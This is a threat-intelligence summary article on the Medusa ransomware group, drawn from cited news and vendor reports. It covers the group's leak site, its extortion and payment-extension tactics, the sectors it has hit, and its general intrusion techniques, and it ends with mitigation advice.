The Medusa ransomware group has been increasing its activities and has implemented new strategies to enhance the success rate of its extortion efforts. This article provides an overview of the group’s operations, including their use of a leak site and a Telegram channel to share stolen data, as well as their tactics for negotiating ransom payments.
Description
According to Palo Alto’s Unit 42 threat intelligence group [7], the Medusa ransomware-as-a-service operation began in late 2022 and has recently launched a leak site and a Telegram channel [7]. These platforms are used to share stolen data and offer victims the option to negotiate a lower ransom or pay for a timer extension before the data is leaked. Medusa also provides victims with payment extension schemes and an expanded range of options once their data is first posted on the dedicated leak site [6]. The exact fees charged to victims are negotiated individually [6].
Medusa gained notoriety after a ransomware attack on the Minneapolis Public School District in 2023 [6]. They have recently added promotional videos to their blog [6], showcasing stolen files and indicating a focus on increasing media coverage [6]. Medusa is using other communication channels [6], such as a public Telegram channel [2] [4] [5] [6], to publicize and release stolen data [6]. However, it is unclear if the channel’s owner is affiliated with the group [6].
The Medusa ransomware gang has targeted 74 organizations in 2023, including healthcare entities and not-for-profit organizations [3]. They operate through a dark web leak site [3], where they threaten to publish stolen information unless a ransom is paid [3]. The group offers three options to victims: pay a smaller amount to extend the ransom deadline [3], pay the full amount to have the data deleted [3], or download the data themselves [3] [6]. Medusa has targeted various sectors [3], with tech companies [3], education [3], and manufacturing being the most common [3]. The group has also targeted organizations in healthcare [3], hospitality [3], media [3] [4] [6], insurance [3], mining [3], and more. While the majority of victims are from the US [3], UK [3] [4], and France [3], smaller countries like Bolivia [3], Portugal [3], and Serbia have also been impacted [3].
Medusa employs various techniques to gain access to victim networks [3], including exploiting vulnerabilities and using access brokers [3]. They have been observed using unique tactics [3], such as uploading a web shell to a previously exploited Microsoft Exchange Server and using PowerShell to run a bitsadmin transfer [3]. The Medusa ransomware binary uses RSA asymmetric encryption and renames encrypted files with the extension medusa [3]. The group leaves a document called !!readmemedusa!!.txt on affected machines [3]. Medusa is considered a significant threat actor in the ransomware landscape [3], showcasing complex propagation methods and adeptly avoiding detection through living-off-the-land techniques [3].
In 2023, the Medusa ransomware group compromised multiple school districts and exposed sensitive information about students [1]. They use initial access brokers (IABs) to gain network access [1], which has proven to be lucrative for them [1]. Medusa also employs double ransoms [1], where they demand one ransom to decrypt encrypted data and another to prevent the leaking of stolen data [1] [2]. The emergence of Medusa in late 2022 and its activities in 2023 have marked a significant development in the ransomware landscape [1]. They utilize complex propagation methods [1], exploit system vulnerabilities [1] [3] [7], and leverage IABs while avoiding detection through living-off-the-land techniques [1]. Medusa’s indiscriminate targeting of 74 organizations across various industries highlights the universal threat posed by ransomware actors [1] [2].
Conclusion
The Medusa ransomware group’s activities have had significant impacts on numerous organizations, particularly in the healthcare, education [3], and manufacturing sectors [3]. Their use of sophisticated techniques and their ability to evade detection pose a serious threat to cybersecurity. Mitigating this threat requires a comprehensive approach that includes vulnerability management, network monitoring, and employee education. The emergence of Medusa and their increasing activities underscore the need for continued vigilance and proactive measures to protect against ransomware attacks.
References
[1] https://flyytech.com/2024/01/13/medusa-group-steps-up-ransomware-activities/
[2] https://www.csoonline.com/article/1290677/medusa-group-steps-up-ransomware-activities.html
[3] https://www.cyberdaily.au/security/10021-more-monster-than-myth-unpacking-the-medusa-ransomware-operation
[4] https://thehackernews.com/2024/01/medusa-ransomware-on-rise-from-data.html
[5] https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/
[6] https://www.itpro.com/security/ransomware/ransomware-victims-are-being-offered-payment-extension-plans-as-groups-ratchet-up-pressure
[7] https://www.databreachtoday.com/ransomware-trends-medusa-akira-rage-tortilla-disrupted-a-24088